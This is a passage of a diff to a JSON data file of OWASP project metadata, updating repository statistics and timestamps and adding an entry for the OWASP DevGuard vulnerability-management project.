"2024-09-14T17:21:12Z", - "updated_at": "2024-09-14T17:21:12Z", + "pushed_at": "2024-09-22T18:20:29Z", + "updated_at": "2024-09-22T18:20:29Z", "owasp_repository": 583, "organizations": [ 1 @@ -464453,9 +725520,9 @@ "forks_count": 35, "open_issues_count": 3, "releases_count": 0, - "stars_count": 80, + "stars_count": 82, "subscribers_count": 36, - "watchers_count": 80, + "watchers_count": 82, "languages": [], "licenses": [], "topics": [], @@ -464696,10 +725763,10 @@ "https://github.com/securecodebox/securecodebox" ], "invalid_urls": [], - "commits_count": 7697, + "commits_count": 7711, "contributors_count": 57, "forks_count": 149, - "open_issues_count": 104, + "open_issues_count": 100, "releases_count": 74, "stars_count": 769, "subscribers_count": 25, @@ -464733,8 +725800,8 @@ ], "created_at": "2019-09-12T20:27:40Z", "released_at": "2024-09-06T14:08:43Z", - "pushed_at": "2024-09-18T09:23:35Z", - "updated_at": "2024-09-18T09:23:35Z", + "pushed_at": "2024-09-22T15:44:01Z", + "updated_at": "2024-09-22T15:44:01Z", "owasp_repository": 881, "organizations": [ 24, @@ -465491,14 +726558,14 @@ "https://github.com/livingsocial/lein-dependency-check" ], "invalid_urls": [], - "commits_count": 10146, + "commits_count": 10162, "contributors_count": 284, - "forks_count": 1261, - "open_issues_count": 554, + "forks_count": 1262, + "open_issues_count": 548, "releases_count": 75, - "stars_count": 6307, + "stars_count": 6319, "subscribers_count": 177, - "watchers_count": 6307, + "watchers_count": 6319, "languages": [ "CMake", "Clojure", @@ -465551,8 +726618,8 @@ ], "created_at": "2019-09-12T20:25:21Z", "released_at": "2024-09-01T12:14:16Z", - "pushed_at": "2024-09-18T16:32:20Z", - "updated_at": "2024-09-18T16:32:20Z", + "pushed_at": "2024-09-21T15:55:33Z", + "updated_at": "2024-09-21T15:55:33Z", "owasp_repository": 896, "organizations": [ 25, @@ -465812,14 +726879,14 @@ "https://github.com/owasp/o-saft" ], "invalid_urls": [], - "commits_count": 6817, + "commits_count": 6860, "contributors_count": 9, - "forks_count": 97, + "forks_count": 85, "open_issues_count": 12, "releases_count": 23, - "stars_count": 372, + "stars_count": 371, "subscribers_count": 36, - "watchers_count": 372, + "watchers_count": 371, "languages": [ "Dockerfile", "Makefile", @@ -465839,8 +726906,8 @@ ], "created_at": "2019-09-12T20:24:39Z", "released_at": "2024-06-24T20:18:17Z", - "pushed_at": "2024-09-09T19:47:58Z", - "updated_at": "2024-09-09T19:47:58Z", + "pushed_at": "2024-09-22T10:43:03Z", + "updated_at": "2024-09-22T10:43:03Z", "owasp_repository": 901, "organizations": [ 1 @@ -466004,12 +727071,12 @@ "invalid_urls": [], "commits_count": 8257, "contributors_count": 217, - "forks_count": 2293, - "open_issues_count": 239, + "forks_count": 2296, + "open_issues_count": 243, "releases_count": 23, - "stars_count": 11610, + "stars_count": 11622, "subscribers_count": 421, - "watchers_count": 11610, + "watchers_count": 11622, "languages": [ "Dockerfile", "Python", @@ -466155,7 +727222,7 @@ "https://github.com/owasp/owasp-swag" ], "invalid_urls": [], - "commits_count": 719, + "commits_count": 723, "contributors_count": 19, "forks_count": 43, "open_issues_count": 8, @@ -466191,12 +727258,12 @@ ], "created_at": "2019-09-12T20:23:55Z", "released_at": null, - "pushed_at": "2024-09-15T00:08:19Z", - "updated_at": "2024-09-15T00:08:19Z", + "pushed_at": "2024-09-22T00:08:28Z", + "updated_at": "2024-09-22T00:08:28Z", "owasp_repository": 906, "organizations": [ - 1, - 46 + 46, + 1 ], "owners": [ 1, @@ -466911,12 +727978,12 @@ "invalid_urls": [], "commits_count": 3041, "contributors_count": 55, - "forks_count": 237, - "open_issues_count": 71, + "forks_count": 238, + "open_issues_count": 74, "releases_count": 21, - "stars_count": 889, + "stars_count": 890, "subscribers_count": 27, - "watchers_count": 889, + "watchers_count": 890, "languages": [ "JavaScript", "Vue" @@ -466935,8 +728002,8 @@ ], "created_at": "2019-09-12T20:21:26Z", "released_at": "2024-02-18T08:45:14Z", - "pushed_at": "2024-09-13T21:03:45Z", - "updated_at": "2024-09-13T21:03:45Z", + "pushed_at": "2024-09-22T19:08:29Z", + "updated_at": "2024-09-22T19:08:29Z", "owasp_repository": 920, "organizations": [ 1 @@ -467058,11 +728125,11 @@ "commits_count": 10845, "contributors_count": 357, "forks_count": 1518, - "open_issues_count": 338, + "open_issues_count": 335, "releases_count": 197, - "stars_count": 3612, + "stars_count": 3615, "subscribers_count": 207, - "watchers_count": 3612, + "watchers_count": 3615, "languages": [ "Dockerfile", "Go", @@ -467104,8 +728171,8 @@ ], "created_at": "2019-09-12T20:21:09Z", "released_at": "2024-09-16T19:11:49Z", - "pushed_at": "2024-09-18T16:58:47Z", - "updated_at": "2024-09-18T16:58:47Z", + "pushed_at": "2024-09-21T16:53:24Z", + "updated_at": "2024-09-21T16:53:24Z", "owasp_repository": 922, "organizations": [ 31, @@ -467422,12 +728489,12 @@ "invalid_urls": [], "commits_count": 539, "contributors_count": 48, - "forks_count": 1041, + "forks_count": 1042, "open_issues_count": 15, "releases_count": 4, - "stars_count": 659, + "stars_count": 660, "subscribers_count": 57, - "watchers_count": 659, + "watchers_count": 660, "languages": [ "Java" ], @@ -467438,8 +728505,8 @@ "topics": [], "created_at": "2019-09-12T20:20:17Z", "released_at": "2016-10-01T18:05:59Z", - "pushed_at": "2024-09-13T14:52:45Z", - "updated_at": "2024-09-13T14:52:45Z", + "pushed_at": "2024-09-20T14:24:10Z", + "updated_at": "2024-09-20T14:24:10Z", "owasp_repository": 928, "organizations": [ 32, @@ -467489,9 +728556,9 @@ "forks_count": 219, "open_issues_count": 7, "releases_count": 0, - "stars_count": 859, + "stars_count": 863, "subscribers_count": 60, - "watchers_count": 859, + "watchers_count": 863, "languages": [], "licenses": [ "Apache License 2.0" @@ -467628,14 +728695,14 @@ "https://github.com/dependencytrack/vue-easy-pie-chart" ], "invalid_urls": [], - "commits_count": 5498, + "commits_count": 5514, "contributors_count": 118, "forks_count": 542, - "open_issues_count": 727, + "open_issues_count": 729, "releases_count": 59, - "stars_count": 2584, - "subscribers_count": 70, - "watchers_count": 2584, + "stars_count": 2586, + "subscribers_count": 69, + "watchers_count": 2586, "languages": [ "Go", "Java", @@ -467683,9 +728750,9 @@ "vulnerability-detection" ], "created_at": "2019-09-12T20:19:51Z", - "released_at": "2024-09-11T12:50:32Z", - "pushed_at": "2024-09-18T15:32:39Z", - "updated_at": "2024-09-18T15:32:39Z", + "released_at": "2024-09-19T14:57:25Z", + "pushed_at": "2024-09-22T15:14:27Z", + "updated_at": "2024-09-22T15:14:27Z", "owasp_repository": 931, "organizations": [ 33, @@ -467798,12 +728865,12 @@ "invalid_urls": [], "commits_count": 20085, "contributors_count": 108, - "forks_count": 10414, + "forks_count": 10445, "open_issues_count": 16, "releases_count": 209, - "stars_count": 10120, - "subscribers_count": 162, - "watchers_count": 10120, + "stars_count": 10200, + "subscribers_count": 163, + "watchers_count": 10200, "languages": [ "Dockerfile", "Go", @@ -467847,9 +728914,9 @@ "vulnerable" ], "created_at": "2019-09-12T20:19:35Z", - "released_at": "2024-09-10T09:40:37Z", - "pushed_at": "2024-09-15T18:19:52Z", - "updated_at": "2024-09-15T18:19:52Z", + "released_at": "2024-09-19T13:26:34Z", + "pushed_at": "2024-09-22T14:43:22Z", + "updated_at": "2024-09-22T14:43:22Z", "owasp_repository": 933, "organizations": [ 29, @@ -467944,11 +729011,11 @@ "https://github.com/owasp/cornucopia" ], "invalid_urls": [], - "commits_count": 1936, + "commits_count": 1944, "contributors_count": 11, "forks_count": 20, "open_issues_count": 6, - "releases_count": 6, + "releases_count": 7, "stars_count": 40, "subscribers_count": 13, "watchers_count": 40, @@ -467968,9 +729035,9 @@ "threat-modeling" ], "created_at": "2019-09-12T20:19:18Z", - "released_at": "2024-09-18T09:00:19Z", - "pushed_at": "2024-09-18T09:00:17Z", - "updated_at": "2024-09-18T09:00:19Z", + "released_at": "2024-09-20T08:33:37Z", + "pushed_at": "2024-09-20T08:33:36Z", + "updated_at": "2024-09-20T08:33:37Z", "owasp_repository": 935, "organizations": [ 1 @@ -468023,14 +729090,14 @@ "https://github.com/owasp-blt/blt-flutter" ], "invalid_urls": [], - "commits_count": 2755, + "commits_count": 2756, "contributors_count": 57, - "forks_count": 132, - "open_issues_count": 233, + "forks_count": 133, + "open_issues_count": 235, "releases_count": 8, - "stars_count": 132, + "stars_count": 133, "subscribers_count": 9, - "watchers_count": 132, + "watchers_count": 133, "languages": [ "C++", "CMake", @@ -468070,8 +729137,8 @@ ], "created_at": "2019-09-12T20:19:09Z", "released_at": "2024-06-30T18:02:19Z", - "pushed_at": "2024-09-18T00:52:37Z", - "updated_at": "2024-09-18T00:52:37Z", + "pushed_at": "2024-09-20T00:12:40Z", + "updated_at": "2024-09-20T00:12:40Z", "owasp_repository": 936, "organizations": [ 34, @@ -468275,7 +729342,7 @@ "commits_count": 549, "contributors_count": 22, "forks_count": 213, - "open_issues_count": 127, + "open_issues_count": 128, "releases_count": 7, "stars_count": 847, "subscribers_count": 34, @@ -468290,8 +729357,8 @@ "topics": [], "created_at": "2019-09-12T20:18:35Z", "released_at": "2024-03-25T18:40:15Z", - "pushed_at": "2024-08-21T14:19:55Z", - "updated_at": "2024-08-21T14:19:55Z", + "pushed_at": "2024-09-19T16:18:55Z", + "updated_at": "2024-09-19T16:18:55Z", "owasp_repository": 940, "organizations": [ 1 @@ -468595,9 +729662,9 @@ "forks_count": 112, "open_issues_count": 3, "releases_count": 3, - "stars_count": 483, + "stars_count": 484, "subscribers_count": 50, - "watchers_count": 483, + "watchers_count": 484, "languages": [ "Java" ], @@ -469008,7 +730075,7 @@ "invalid_urls": [], "commits_count": 370, "contributors_count": 28, - "forks_count": 68, + "forks_count": 69, "open_issues_count": 6, "releases_count": 0, "stars_count": 121, @@ -469065,12 +730132,12 @@ "invalid_urls": [], "commits_count": 1019, "contributors_count": 121, - "forks_count": 1309, + "forks_count": 1312, "open_issues_count": 52, "releases_count": 3, - "stars_count": 7122, + "stars_count": 7138, "subscribers_count": 330, - "watchers_count": 7122, + "watchers_count": 7138, "languages": [ "Dockerfile" ], @@ -469159,10 +730226,10 @@ "contributors_count": 35, "forks_count": 133, "open_issues_count": 43, - "releases_count": 17, - "stars_count": 396, + "releases_count": 18, + "stars_count": 395, "subscribers_count": 64, - "watchers_count": 396, + "watchers_count": 395, "languages": [ "Dockerfile", "JavaScript", @@ -469186,9 +730253,9 @@ "security" ], "created_at": "2019-09-12T20:16:12Z", - "released_at": "2024-09-11T14:59:21Z", - "pushed_at": "2024-09-18T19:09:11Z", - "updated_at": "2024-09-18T19:09:11Z", + "released_at": "2024-09-18T19:18:36Z", + "pushed_at": "2024-09-22T05:30:14Z", + "updated_at": "2024-09-22T05:30:14Z", "owasp_repository": 956, "organizations": [ 35, @@ -469251,14 +730318,14 @@ "https://github.com/coreruleset/modsecurity-crs-docker" ], "invalid_urls": [], - "commits_count": 5190, + "commits_count": 5192, "contributors_count": 115, - "forks_count": 367, - "open_issues_count": 74, - "releases_count": 28, - "stars_count": 2197, + "forks_count": 368, + "open_issues_count": 73, + "releases_count": 32, + "stars_count": 2206, "subscribers_count": 55, - "watchers_count": 2197, + "watchers_count": 2206, "languages": [ "C", "Dockerfile", @@ -469283,13 +730350,13 @@ "security" ], "created_at": "2019-09-12T20:16:03Z", - "released_at": "2024-09-17T02:09:46Z", - "pushed_at": "2024-09-18T02:21:48Z", - "updated_at": "2024-09-18T02:21:48Z", + "released_at": "2024-09-21T02:21:26Z", + "pushed_at": "2024-09-22T02:26:56Z", + "updated_at": "2024-09-22T02:26:56Z", "owasp_repository": 957, "organizations": [ - 36, - 1 + 1, + 36 ], "owners": [ 1, @@ -469409,12 +730476,12 @@ "invalid_urls": [], "commits_count": 1808, "contributors_count": 452, - "forks_count": 3869, - "open_issues_count": 45, + "forks_count": 3874, + "open_issues_count": 48, "releases_count": 0, - "stars_count": 27628, + "stars_count": 27658, "subscribers_count": 570, - "watchers_count": 27628, + "watchers_count": 27658, "languages": [ "Java", "Makefile", @@ -469481,12 +730548,12 @@ "invalid_urls": [], "commits_count": 3010, "contributors_count": 105, - "forks_count": 5359, + "forks_count": 5364, "open_issues_count": 56, "releases_count": 11, - "stars_count": 6877, + "stars_count": 6884, "subscribers_count": 211, - "watchers_count": 6877, + "watchers_count": 6884, "languages": [ "Java", "JavaScript" @@ -469501,8 +730568,8 @@ "updated_at": "2024-09-16T09:25:23Z", "owasp_repository": 960, "organizations": [ - 37, - 1 + 1, + 37 ], "owners": [ 1, @@ -469604,9 +730671,9 @@ "forks_count": 826, "open_issues_count": 97, "releases_count": 0, - "stars_count": 4247, - "subscribers_count": 314, - "watchers_count": 4247, + "stars_count": 4254, + "subscribers_count": 316, + "watchers_count": 4254, "languages": [ "Shell" ], @@ -469660,14 +730727,14 @@ "https://github.com/owasp/asvs" ], "invalid_urls": [], - "commits_count": 2381, + "commits_count": 2392, "contributors_count": 97, - "forks_count": 655, - "open_issues_count": 129, + "forks_count": 658, + "open_issues_count": 126, "releases_count": 3, - "stars_count": 2692, + "stars_count": 2694, "subscribers_count": 149, - "watchers_count": 2692, + "watchers_count": 2694, "languages": [ "Makefile", "Python", @@ -469680,8 +730747,8 @@ "topics": [], "created_at": "2019-09-12T20:15:07Z", "released_at": "2021-10-28T19:28:09Z", - "pushed_at": "2024-09-18T11:33:03Z", - "updated_at": "2024-09-18T11:33:03Z", + "pushed_at": "2024-09-22T17:23:57Z", + "updated_at": "2024-09-22T17:23:57Z", "owasp_repository": 963, "organizations": [ 1 @@ -469729,9 +730796,9 @@ "forks_count": 469, "open_issues_count": 79, "releases_count": 12, - "stars_count": 1804, - "subscribers_count": 128, - "watchers_count": 1804, + "stars_count": 1806, + "subscribers_count": 127, + "watchers_count": 1806, "languages": [ "JavaScript", "Python", @@ -469802,12 +730869,12 @@ "invalid_urls": [], "commits_count": 930, "contributors_count": 43, - "forks_count": 450, + "forks_count": 449, "open_issues_count": 131, "releases_count": 4, - "stars_count": 1329, + "stars_count": 1331, "subscribers_count": 86, - "watchers_count": 1329, + "watchers_count": 1331, "languages": [ "Java" ], @@ -470193,14 +731260,14 @@ "https://github.com/owasp/nettacker" ], "invalid_urls": [], - "commits_count": 2513, - "contributors_count": 45, - "forks_count": 747, + "commits_count": 2528, + "contributors_count": 46, + "forks_count": 749, "open_issues_count": 25, "releases_count": 12, - "stars_count": 3329, + "stars_count": 3337, "subscribers_count": 103, - "watchers_count": 3329, + "watchers_count": 3337, "languages": [ "JavaScript", "Python" @@ -470232,8 +731299,8 @@ ], "created_at": "2019-09-12T20:13:45Z", "released_at": "2024-01-20T22:17:39Z", - "pushed_at": "2024-09-18T12:44:37Z", - "updated_at": "2024-09-18T12:44:37Z", + "pushed_at": "2024-09-21T01:58:59Z", + "updated_at": "2024-09-21T01:58:59Z", "owasp_repository": 972, "organizations": [ 1 @@ -470285,11 +731352,11 @@ "commits_count": 833, "contributors_count": 29, "forks_count": 371, - "open_issues_count": 19, + "open_issues_count": 20, "releases_count": 0, - "stars_count": 2020, + "stars_count": 2023, "subscribers_count": 160, - "watchers_count": 2020, + "watchers_count": 2023, "languages": [ "Dockerfile" ], @@ -470357,9 +731424,9 @@ "forks_count": 368, "open_issues_count": 123, "releases_count": 14, - "stars_count": 610, + "stars_count": 609, "subscribers_count": 57, - "watchers_count": 610, + "watchers_count": 609, "languages": [ "Java", "JavaScript" @@ -470747,9 +731814,9 @@ "forks_count": 23, "open_issues_count": 50, "releases_count": 0, - "stars_count": 70, - "subscribers_count": 18, - "watchers_count": 70, + "stars_count": 71, + "subscribers_count": 19, + "watchers_count": 71, "languages": [], "licenses": [ "Other" @@ -470834,8 +731901,8 @@ "updated_at": "2023-07-28T08:34:05Z", "owasp_repository": 982, "organizations": [ - 41, - 1 + 1, + 41 ], "owners": [ 1, @@ -471280,9 +732347,9 @@ "forks_count": 369, "open_issues_count": 16, "releases_count": 0, - "stars_count": 4827, + "stars_count": 4829, "subscribers_count": 129, - "watchers_count": 4827, + "watchers_count": 4829, "languages": [ "Dockerfile", "Go" @@ -471415,9 +732482,9 @@ "forks_count": 141, "open_issues_count": 13, "releases_count": 0, - "stars_count": 534, + "stars_count": 535, "subscribers_count": 25, - "watchers_count": 534, + "watchers_count": 535, "languages": [ "HCL", "Java", @@ -471832,14 +732899,14 @@ "https://github.com/saeeddhqan/maryam" ], "invalid_urls": [], - "commits_count": 888, + "commits_count": 889, "contributors_count": 23, "forks_count": 166, "open_issues_count": 0, - "releases_count": 11, - "stars_count": 1002, + "releases_count": 12, + "stars_count": 1003, "subscribers_count": 37, - "watchers_count": 1002, + "watchers_count": 1003, "languages": [ "Python" ], @@ -471855,9 +732922,9 @@ "social-network" ], "created_at": "2019-09-12T20:09:16Z", - "released_at": "2024-06-19T12:29:08Z", - "pushed_at": "2024-08-26T10:45:05Z", - "updated_at": "2024-08-26T10:45:05Z", + "released_at": "2024-09-19T18:18:53Z", + "pushed_at": "2024-09-19T18:18:53Z", + "updated_at": "2024-09-19T18:18:53Z", "owasp_repository": 1001, "organizations": [ 1 @@ -471903,9 +732970,9 @@ "forks_count": 469, "open_issues_count": 110, "releases_count": 19, - "stars_count": 2260, + "stars_count": 2261, "subscribers_count": 89, - "watchers_count": 2260, + "watchers_count": 2261, "languages": [ "Java", "Kotlin" @@ -472130,11 +733197,11 @@ "commits_count": 123, "contributors_count": 10, "forks_count": 130, - "open_issues_count": 18, + "open_issues_count": 17, "releases_count": 0, - "stars_count": 625, - "subscribers_count": 52, - "watchers_count": 625, + "stars_count": 626, + "subscribers_count": 53, + "watchers_count": 626, "languages": [ "Dockerfile" ], @@ -472376,9 +733443,9 @@ "forks_count": 27, "open_issues_count": 6, "releases_count": 10, - "stars_count": 95, + "stars_count": 96, "subscribers_count": 14, - "watchers_count": 95, + "watchers_count": 96, "languages": [ "Java" ], @@ -472397,8 +733464,8 @@ "updated_at": "2024-09-10T18:43:06Z", "owasp_repository": 1010, "organizations": [ - 43, - 1 + 1, + 43 ], "owners": [ 1, @@ -472699,9 +733766,9 @@ "forks_count": 169, "open_issues_count": 41, "releases_count": 5, - "stars_count": 894, + "stars_count": 897, "subscribers_count": 41, - "watchers_count": 894, + "watchers_count": 897, "languages": [ "Makefile", "Python" @@ -472771,14 +733838,14 @@ "https://github.com/devsecopsmaturitymodel/devsecops-maturitymodel" ], "invalid_urls": [], - "commits_count": 1099, + "commits_count": 1100, "contributors_count": 34, - "forks_count": 278, + "forks_count": 279, "open_issues_count": 2, "releases_count": 40, - "stars_count": 478, + "stars_count": 479, "subscribers_count": 27, - "watchers_count": 478, + "watchers_count": 479, "languages": [ "SCSS", "TypeScript" @@ -472789,12 +733856,12 @@ "topics": [], "created_at": "2019-09-12T20:06:54Z", "released_at": "2024-09-06T12:59:46Z", - "pushed_at": "2024-09-18T10:36:37Z", - "updated_at": "2024-09-18T10:36:37Z", + "pushed_at": "2024-09-19T13:49:56Z", + "updated_at": "2024-09-19T13:49:56Z", "owasp_repository": 1017, "organizations": [ - 47, - 1 + 1, + 47 ], "owners": [ 1, @@ -472852,12 +733919,12 @@ "invalid_urls": [], "commits_count": 2143, "contributors_count": 61, - "forks_count": 1869, + "forks_count": 1870, "open_issues_count": 194, "releases_count": 17, - "stars_count": 11814, + "stars_count": 11829, "subscribers_count": 210, - "watchers_count": 11814, + "watchers_count": 11829, "languages": [ "Go", "Lua", @@ -472905,12 +733972,12 @@ ], "created_at": "2019-09-12T20:06:46Z", "released_at": "2023-09-10T20:52:27Z", - "pushed_at": "2024-09-18T18:21:22Z", - "updated_at": "2024-09-18T18:21:22Z", + "pushed_at": "2024-09-22T17:01:54Z", + "updated_at": "2024-09-22T17:01:54Z", "owasp_repository": 1018, "organizations": [ - 48, - 1 + 1, + 48 ], "owners": [ 1, @@ -473064,8 +734131,8 @@ ], "related_urls": [], "invalid_urls": [], - "commits_count": 13, - "contributors_count": 1, + "commits_count": 14, + "contributors_count": 2, "forks_count": 0, "open_issues_count": 0, "releases_count": 0, @@ -473079,8 +734146,8 @@ "topics": [], "created_at": "2024-09-17T19:19:08Z", "released_at": null, - "pushed_at": "2024-09-17T19:19:21Z", - "updated_at": "2024-09-17T19:19:21Z", + "pushed_at": "2024-09-20T08:32:58Z", + "updated_at": "2024-09-20T08:32:58Z", "owasp_repository": 1471, "organizations": [ 1 @@ -473119,11 +734186,11 @@ "invalid_urls": [], "commits_count": 13, "contributors_count": 1, - "forks_count": 1, + "forks_count": 2, "open_issues_count": 0, "releases_count": 0, "stars_count": 1, - "subscribers_count": 2, + "subscribers_count": 3, "watchers_count": 1, "languages": [], "licenses": [ @@ -473145,5 +734212,83 @@ 1472 ] } +}, +{ + "model": "owasp.project", + "pk": 353, + "fields": { + "nest_created_at": "2024-09-20T17:43:00.089Z", + "nest_updated_at": "2024-09-20T17:43:00.089Z", + "name": "OWASP DevGuard", + "key": "www-project-devguard", + "description": "A usable central vulnerability management system for developers and security teams.", + "summary": "OWASP DevGuard is a project designed to help developers and security teams manage software vulnerabilities more easily. It aims to integrate security practices into the software development process, making them accessible and efficient for users with varying levels of expertise. DevGuard focuses on identifying and prioritizing vulnerabilities based on their actual risk, rather than treating all critical issues the same. The system supports various security tools and offers automated monitoring to keep projects secure. Overall, DevGuard serves as a central hub for managing vulnerabilities throughout the development lifecycle.", + "is_active": true, + "has_active_repositories": true, + "level": "incubator", + "level_raw": "2", + "type": "other", + "type_raw": "", + "tags": [ + "devguard", + "flawfix", + "vulnerability-management", + "sbom", + "cve", + "cwe" + ], + "leaders_raw": [ + "Frédéric Noppe", + "Sebastian Kawelke", + "Tim Bastin" + ], + "related_urls": [ + "https://github.com/l3montree-dev/devguard", + "https://github.com/l3montree-dev/devguard-web" + ], + "invalid_urls": [], + "commits_count": 564, + "contributors_count": 6, + "forks_count": 4, + "open_issues_count": 43, + "releases_count": 27, + "stars_count": 37, + "subscribers_count": 5, + "watchers_count": 37, + "languages": [ + "Go", + "SCSS", + "TypeScript" + ], + "licenses": [ + "GNU Affero General Public License v3.0", + "Other" + ], + "topics": [ + "cve", + "cve-management", + "it-security", + "vulnerability", + "vulnerability-management" + ], + "created_at": "2024-01-29T21:41:40Z", + "released_at": "2024-09-19T10:37:52Z", + "pushed_at": "2024-09-20T13:37:49Z", + "updated_at": "2024-09-20T13:37:49Z", + "owasp_repository": 65, + "organizations": [ + 4, + 1 + ], + "owners": [ + 1, + 931 + ], + "repositories": [ + 65, + 1210, + 1211 + ] + } } ]